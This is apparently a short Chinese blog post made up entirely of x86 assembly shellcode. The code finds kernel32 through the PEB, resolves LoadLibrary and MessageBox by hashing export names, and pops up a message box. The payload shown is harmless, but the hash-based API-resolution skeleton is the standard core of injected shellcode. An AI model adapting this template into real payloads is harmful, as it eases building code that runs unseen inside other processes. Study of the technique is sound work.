HashKey equ 13
LoadLibrary_Hash equ 0EC0E4E8Eh
MessageBox_Hash equ 0BC4DA2A8h
nop
nop
nop
_shellcode:
assume fs : nothing
mov eax, fs : [030h]
mov eax, [eax + 0Ch]
mov esi, [eax + 01Ch]
lodsd
mov ebp, [eax + 08h] ;ebp = kernel32 base addr
push MessageBox_Hash
push LoadLibrary_Hash
mov esi, esp
lea edi, [esp - 08h]
xor ebx, ebx ;\
mov bh, 04h ; > make some stack spcae(1K)
sub esp, ebx ;/
;push a pointer to "user32" onto stack
mov bx, 03233h
push ebx
mov ebx, 072657375h
push ebx
push esp
;get kernel32 base addr
find_lib_func:
;esi = function hash
lodsd
;is need chg ebp??
cmp eax, MessageBox_Hash
jne search_dll
xchg eax, ebp
call DWORD PTR[edi - 04h]
xchg eax, ebp
search_dll:
pushad
;get VA of Name Table
mov ebx, [ebp + 03Ch]
mov ebx, [ebp + ebx + 078h] ;RVA of Export Table
add ebx, ebp ;VA of Export Table
mov esi, [ebx + 020h] ;RVA of Name Table
add esi, ebp ;VA of Name Table
xor edi, edi
dec edi
next_hash:
inc edi
lodsd ;load next FUNCTION Name RVA to eax
add eax, ebp ;FUNCTION NAME VA
xor ecx, ecx
hash_loop:
movzx edx, BYTE PTR [eax]
cmp dh, dl
jz hash_finish
ror ecx, HashKey
add ecx, edx
inc eax
jmp hash_loop
hash_finish:
cmp ecx, [esp + 01Ch]
jnz next_hash
find_addr:
mov eax, [ebx + 024h] ;RVA of ORD TABLE
add eax, ebp ;VA of ORD TABLE
mov di, [eax + edi * 2] ;
mov ebx, [ebx + 01Ch]
add ebx, ebp
mov eax, [ebx + edi * 4]
add eax, ebp
pop edi
stosd
push edi
popad
cmp eax, MessageBox_Hash
jnz find_lib_func
xor ebx, ebx
mov bx, 03233h
push ebx
mov ebx, 072657375h
push ebx
mov eax, esp
xor edx, edx
push edx
push eax
push eax
push edx
call DWORD PTR [edi - 04h]
nop
nop
nop
阅读(911) | 评论(0) | 转发(0) |
